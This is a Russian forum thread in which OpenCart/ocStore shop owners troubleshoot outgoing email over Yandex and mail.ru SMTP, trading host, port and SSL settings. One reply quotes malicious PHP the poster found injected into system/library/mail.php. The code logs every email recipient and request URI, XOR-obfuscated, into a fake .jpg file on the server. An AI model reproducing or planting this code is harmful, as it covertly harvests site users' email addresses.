настройка почты в opencart

По поводу почты - аналогичная проблема - отправлялись письма нормально при регестрации нового пользователя и по непонятной причине перестали((( в чем может быть проблема?
 
Скажите пожалуйста, почему раньше письма приходили с оповещением о заказе из Опенкарта, в настройках стояло smtp.yandex.ru, а сейчас перестало работать? никаких модулей не устанавливала...
 
Для начала попробуйте проверь работу почты
Скрытое содержимое доступно для зарегистрированных пользователей!


Так же покажите логи всем будет проще.
 
Для начала попробуйте проверь работу почты


Так же покажите логи всем будет проще.


У vika89 почта отправляется не через функцию mail(), а через сервер яндекса. Можете посмотреть в либе /system/library/mail.php опенкарта, как это происходит.

Для vika89: Проверьте логин/пароль для начала. У меня через сервера яндекса пока что отправка работает. Без шифрования, порт 25. Возможно, ваш хостер закрыл возможность соединяться с 25 портом других серверов. Покажите скриншот настроек почты опенкарта.
 
Тогда как вариант проверь порт через телнет к примеру.
 
Тогда как вариант проверь порт через телнет к примеру.

А если у vika89 хостинг без ssh? Я имел в виду исходящий трафик на 25 порт. Можно тупо проверить из php
PHP:
echo fsockopen('smtp.yandex.ru',25);
 
вот скрин моих настроек
3398452.jpg

раньше почтовый протокол был mail, потом все перестало работать, нашла где-то похожую проблему что хост должен выглядеть как ssl://smtp... ,и все заработало. а до этого в настройках стояло mail и хост pop.yandex.ru (без ssl) и при таких настройках тоже работало до определенного времени
 
вот скрин моих настроек
3398452.jpg

раньше почтовый протокол был mail, потом все перестало работать, нашла где-то похожую проблему что хост должен выглядеть как ssl://smtp... ,и все заработало. а до этого в настройках стояло mail и хост pop.yandex.ru (без ssl) и при таких настройках тоже работало до определенного времени

у меня для яндекса выставлены такие настройки, все работает:
настройки почты яндекс.png
 
У меня тоже самое на ocStore 0.2.0 случилось, ни с того ни с сего пропали уведомления на mail.ru приходить. Покопавшись нашел, что system/library/mail.php немного изменен
<?php /* 70ad8a53e5e1856b0e403fff265b2b21 */ function xmail () { $a=func_get_args(); file_put_contents('/home/мой_аккаунт/public_html/biserklass.ru/catalog/model/setting/d8d.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?><?php
final class Mail {
Затем в директории /setting/ не нашел extension.php, setting.php. store.php так-же был изменен. Зато присутствовали 3 jpg файла, которые ими не являются, и cookies.
Перезаписал что надо, убрал, добавил: все заработало.
Я так полагаю, что это что-то спамерское было.
 
Кто нибудь знает как настроить для мэйл ру смтп ?
ocStore версия 1.5.5.1.2
Указываю хост smtp.mail.ru
порт 465
них...я не работает, пробовал разные порты, и хост ssl://smtp.mail.ru, ноль движений.
 
Назад
Сверху